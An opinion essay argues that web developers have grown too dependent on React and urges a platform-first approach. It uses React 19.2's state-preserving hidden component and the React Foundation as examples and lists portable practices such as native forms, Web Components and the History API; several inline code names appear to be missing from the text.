When React becomes the lens through which we see the web, we stop noticing what the platform itself can already do, and we stop reaching for native solutions because we’re waiting for the framework-approved version to show up first. And crucially, switching to Solid, Svelte, or Vue wouldn’t eliminate this dynamic; it would only shift its center of gravity. Every framework creates its own orbit of tools, patterns, and dependencies. The goal isn’t to find the “right” framework, but to build applications resilient enough to survive migration to any framework, including those that haven’t been invented yet. This inertia isn’t about laziness; it’s about logistics. Switching stacks is expensive and disruptive. Retraining developers, rebuilding component libraries, and retooling CI pipelines all take time and money, and the payoff is rarely immediate. It’s high risk, high cost, and hard to justify, so most companies stay put, and honestly, who can blame them? But while we stay put, the platform keeps moving. The browser can stream and hydrate progressively, animate transitions natively, and coordinate rendering work without a framework. Yet most development teams won’t touch those capabilities until they’re built in or officially blessed by the ecosystem. That isn’t an engineering limitation; it’s a cultural one. We’ve somehow made “works in all browsers” feel riskier than “works in our framework.” Better governance doesn’t solve this. The problem isn’t React’s organizational structure; it’s our relationship to it. Too many teams wait for React to package and approve platform capabilities before adopting them, even when those same features already exist in browsers today. React 19.2’s `` component captures this pattern perfectly. It serves as a boundary that hides UI while preserving component state and unmounting effects. When set to , it pauses subscriptions, timers, and network requests while keeping form inputs and scroll positions intact. 
When revealed again by setting , those effects remount cleanly. It’s a genuinely useful feature. Tabbed interfaces, modals, and progressive rendering all benefit from it, and the same idea extends to cases where you want to pre-render content in the background or preserve state as users navigate between views. It integrates smoothly with React’s lifecycle and `` boundaries, enabling selective hydration and smarter rendering strategies. But it also draws an important line between formalization and innovation. The core concept isn’t new; it’s simply about pausing side effects while maintaining state. Similar behavior can already be built with visibility observers, effect cleanup, and careful state management patterns. The web platform even provides the primitives for it through tools like , DOM state preservation, and manual effect control. What . Yet it also exposes how dependent our thinking has become on frameworks. We wait for React to formalize platform behaviors instead of reaching for them directly. This isn’t a criticism of `` itself; it’s a well-designed API that solves a real problem. But it serves as a reminder that we’ve grown comfortable waiting for framework solutions to problems the platform already lets us solve. After orbiting React for so long, we’ve forgotten what it feels like to build without its pull.
The answer isn’t necessarily to abandon your framework, but to remember that it runs inside the web, not the other way around. I’ve written before about building the web in islands as one way to rediscover platform capabilities we already have. Even within React’s constraints, you can still think platform first:
Use native forms and form submissions to a server, then enhance with client-side logic
Prefer semantic HTML and ARIA before reaching for component libraries
Try View Transitions directly with minimal React wrappers instead of waiting for an official API
Use Web Components for self-contained widgets that could survive a framework migration
Keep business logic framework-agnostic, plain TypeScript modules rather than hooks, and aim to keep your hooks short by pulling logic from outside React
Profile performance using browser DevTools first and React DevTools second
Try native CSS features like , , scroll snap , , and before adding JavaScript solutions
Use , , and instead of framework-specific alternatives wherever possible
Experiment with the History API ( , ) directly before reaching for React Router
Structure code so routing, data fetching, and state management can be swapped out independently of React
Test against real browser APIs and behaviors, not just framework abstractions
These aren’t anti-React practices, they’re portable practices that make your web app more resilient. They let you adopt new browser capabilities as soon as they ship, not months later when they’re wrapped in a hook. They make framework migration feasible rather than catastrophic. When you build this way, React becomes a rendering library that happens to be excellent at its job, not the foundation everything else has to depend on. A React app that respects the platform can outlast React itself. When you treat React as an implementation detail instead of an identity, your architecture becomes portable. When you embrace progressive enhancement and web semantics, your ideas survive the next framework wave.
The recent wave of changes, including the React Foundation, React Compiler v1.0, the `` component, and internal research into alternative architectures, all represent genuine progress. The React team is doing thoughtful work, but these updates also serve as reminders of how tightly the industry has become coupled to a single ecosystem’s timeline. That timeline is still dictated by the engineering priorities of large corporations, and that remains true regardless of who governs the project. If your team’s evolution depends on a single framework’s roadmap, you are not steering your product; you are waiting for permission to move. That is true whether you are using React, Vue, Angular, or Svelte. The framework does not matter; the dependency does.
It is ironic that we spent years escaping jQuery’s gravity, only to end up caught in another orbit. React was once the radical idea that changed how we build for the web. Every successful framework reaches this point eventually, when it shifts from innovation to institution, from tool to assumption. jQuery did it, React did it, and something else will do it next. The React Foundation is a positive step for the project’s long-term sustainability, but the next real leap forward will not come from better governance. It will not come from React finally adopting signals either, and it will not come from any single framework “getting it right.” Progress will come from developers who remember that frameworks are implementation details, not identities. Build for the platform first. Choose frameworks second.
The web isn’t React’s, it isn’t Vue’s, and it isn’t Svelte’s. It belongs to no one. If we remember that, it will stay free to evolve at its own pace, drawing the best ideas from everywhere rather than from whichever framework happens to hold the cultural high ground. Frameworks are scaffolding, not the building. Escaping their gravity does not mean abandoning progress; it means finding enough momentum to keep moving. Reaching escape velocity, one project at a time.
